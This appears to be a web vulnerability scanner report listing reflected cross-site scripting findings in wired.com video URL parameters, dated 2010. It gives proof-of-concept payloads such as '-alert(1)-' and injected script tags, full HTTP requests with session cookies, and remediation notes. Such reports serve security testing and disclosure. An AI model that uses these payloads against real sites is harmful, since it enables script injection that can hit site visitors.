This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightse35b7"-alert(1)-"02dcf902f19/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:50:38 GMT Date: Mon, 22 Nov 2010 00:45:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59286"-alert(1)-"69a9f6b985b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057459286"-alert(1)-"69a9f6b985b/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:11 GMT Date: Mon, 22 Nov 2010 00:46:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b7af"-alert(1)-"c7c42779efd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international6b7af"-alert(1)-"c7c42779efd/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:51:09 GMT Date: Mon, 22 Nov 2010 00:46:20 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f751c"-alert(1)-"9e4be7cf9e3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001f751c"-alert(1)-"9e4be7cf9e3 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:51:36 GMT Date: Mon, 22 Nov 2010 00:46:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bbeb0--><script>alert(1)</script>92733e52164 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videobbeb0--><script>alert(1)</script>92733e52164/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29479 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:20 GMT Date: Mon, 22 Nov 2010 00:45:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videobbeb0--><script>alert(1)</script>92733e52164/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe95"><a>e214857df01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videocfe95"><a>e214857df01/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29444 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:44 GMT Date: Mon, 22 Nov 2010 00:44:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videocfe95"><a>e214857df01 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2b9"><a>01f61234896 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos7e2b9"><a>01f61234896/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:31 GMT Date: Mon, 22 Nov 2010 00:45:31 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106790
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos7e2b9"><a>01f61234896 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ba47"-alert(1)-"40453ca693 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos7ba47"-alert(1)-"40453ca693/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:51:17 GMT Date: Mon, 22 Nov 2010 00:46:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a937"><a>62e50e68a4c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights1a937"><a>62e50e68a4c/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:32 GMT Date: Mon, 22 Nov 2010 00:46:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106719
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights1a937"><a>62e50e68a4c"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9420"-alert(1)-"98c086f2364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsf9420"-alert(1)-"98c086f2364/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:37 GMT Date: Mon, 22 Nov 2010 00:47:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e96d"-alert(1)-"764235caa89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/17164405742e96d"-alert(1)-"764235caa89/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:50 GMT Date: Mon, 22 Nov 2010 00:47:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed62f"-alert(1)-"b13676a10a0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-boxed62f"-alert(1)-"b13676a10a0/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:52:59 GMT Date: Mon, 22 Nov 2010 00:47:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1450"-alert(1)-"c5b613f454c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001a1450"-alert(1)-"c5b613f454c HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:53:09 GMT Date: Mon, 22 Nov 2010 00:48:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9df2e--><script>alert(1)</script>c0a6c52dd39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video9df2e--><script>alert(1)</script>c0a6c52dd39/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29470 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:50 GMT Date: Mon, 22 Nov 2010 00:42:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video9df2e--><script>alert(1)</script>c0a6c52dd39/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15f7a"><a>14ac02a74d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video15f7a"><a>14ac02a74d2/latest-videos/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29435 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:02 GMT Date: Mon, 22 Nov 2010 00:42:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video15f7a"><a>14ac02a74d2 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a284"><a>89e42bb26a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos1a284"><a>89e42bb26a2/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:47:50 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos1a284"><a>89e42bb26a2 c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb0b5"-alert(1)-"46c49765a4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosfb0b5"-alert(1)-"46c49765a4b/highlights/1716440574/green-lantern-theatrical-trailer/680254055001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:04 GMT Date: Mon, 22 Nov 2010 00:44:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
